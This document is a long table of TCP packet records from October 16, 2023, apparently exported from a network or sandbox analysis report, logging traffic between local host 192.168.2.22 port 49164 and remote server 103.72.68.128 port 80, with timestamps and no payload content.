                                                Oct 16, 2023 09:58:26.282144070 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.282222033 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.282227993 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.282264948 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.282264948 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.282268047 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.282285929 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.282310963 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.282327890 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.282396078 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.282447100 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.283396959 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.283422947 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.283457041 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.283474922 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.283510923 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.283541918 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.283551931 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.283580065 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.283637047 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.283663034 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.283679962 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.283684969 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.283726931 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.283760071 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.283797026 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.283799887 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.283838987 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.283874035 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.283909082 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.283963919 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.284003019 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.284101009 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.284101963 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.284142017 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.284162045 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.284199953 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.284234047 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.284271955 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.284373045 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.284413099 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.284434080 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.284461975 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.284472942 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.284549952 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.284590960 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.284626961 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.284666061 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.284710884 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.284754992 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.284787893 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.284830093 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.284950972 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.284990072 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.285010099 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.285128117 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.285175085 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.285191059 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.285213947 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.285224915 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.285249949 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.285285950 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.285320997 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.285356998 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.285413980 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.285453081 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.285487890 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.285533905 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.285567999 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.285614967 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.285635948 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.285679102 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.285695076 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.285737991 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.285753965 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.285793066 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.285813093 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.285850048 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.285857916 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.285888910 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.285919905 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.285967112 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.285974979 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.286006927 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.286031008 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.286041021 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.286086082 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.286123991 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.286133051 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.286170959 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.286180973 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.286200047 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.286221981 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.286233902 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.286292076 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.286331892 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.286356926 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.639933109 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.639959097 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.639971972 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.640012026 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.640012980 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.640028000 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.640048027 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.640048027 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.640064955 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.640091896 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.640135050 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.640166044 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.640202999 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.640233994 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.640269995 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.641092062 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.641134977 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.641155958 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.641191959 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.641222000 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.641258001 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.641319036 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.641323090 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.641352892 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.641423941 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.641463041 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.641491890 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.641527891 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.641576052 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.641613007 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.641661882 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.641701937 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.641757965 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.641797066 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.641845942 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.641880035 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.641911983 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.641946077 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.641976118 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.642008066 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.642062902 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.642096996 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.642318964 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.642360926 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.642457008 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.642524958 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.642584085 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.642616987 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.642616987 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.642616987 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.642626047 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.642659903 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.642699957 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.642744064 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.642756939 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.642808914 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.642822981 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.642862082 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.642916918 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.642956018 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.642986059 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.643021107 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.643085003 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.643121958 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.643141031 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.643174887 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.643204927 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.643234968 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.643244028 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.643270016 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.643284082 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.643318892 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.643335104 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.643369913 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.643424034 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.643460035 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.643460989 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.643495083 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.643562078 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.643595934 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.643625975 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.643660069 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.643723965 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.643759966 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.643970013 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.644010067 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.644027948 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.644066095 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.644083023 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.644119024 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.644161940 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.644203901 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.644222975 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.644258022 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.644295931 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.644330978 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.644396067 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.644431114 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.644448042 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.644483089 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.997730017 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.997752905 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.997842073 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.997858047 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.997900009 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.997963905 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.998017073 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.998045921 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.998078108 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.998086929 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.998115063 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.998126984 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.998156071 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.998338938 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.998385906 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.998414993 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.998475075 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.998497009 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.998541117 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.998574018 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.998610973 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.998646975 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.998688936 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.998718977 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.998755932 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.998778105 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.998799086 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.998821020 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.998837948 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.998856068 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.998895884 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.998919964 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.998963118 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.999056101 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.999094963 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.999195099 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.999233007 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.999243021 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.999280930 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.999322891 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.999360085 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.999365091 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.999402046 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.999820948 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.999864101 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.999871969 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:26.999919891 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:26.999991894 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.000011921 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.000037909 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.000056028 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.000087976 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.000127077 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.000158072 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.000195980 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.000209093 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.000226021 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.000247002 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.000263929 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.000296116 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.000334024 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.000365973 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.000408888 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.000423908 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.000462055 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.000485897 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.000524044 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.000539064 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.000562906 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.000581026 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.000602961 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.000711918 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.000756025 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.000761986 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.000803947 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.000866890 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.000910997 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.000940084 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.000956059 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.000982046 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.001028061 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.001039982 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.001080990 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.001117945 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.001162052 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.001198053 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.001245975 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.001276970 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.001307964 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.001317024 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.001342058 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.001362085 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.001400948 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.001507044 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.001563072 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.001591921 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.001630068 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.001638889 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.001677990 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.001713991 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.001759052 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.001785994 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.001831055 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.001867056 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.001928091 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.001930952 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.001971006 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.001997948 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.002043009 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.002079964 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.002111912 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.002130032 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.002130985 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.002151966 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.002171993 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.002233982 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.002275944 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.002306938 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.002348900 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.002371073 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.002407074 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.002410889 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.002444983 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.002475023 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.002515078 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.002537012 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.002574921 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.002590895 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.002624989 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.002640009 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.002670050 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.002688885 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.002727032 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.002734900 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.002784014 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.002819061 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.002861023 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.002880096 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.002923965 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.009800911 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.009835958 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.009892941 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.009944916 CEST8049164103.72.68.128192.168.2.22
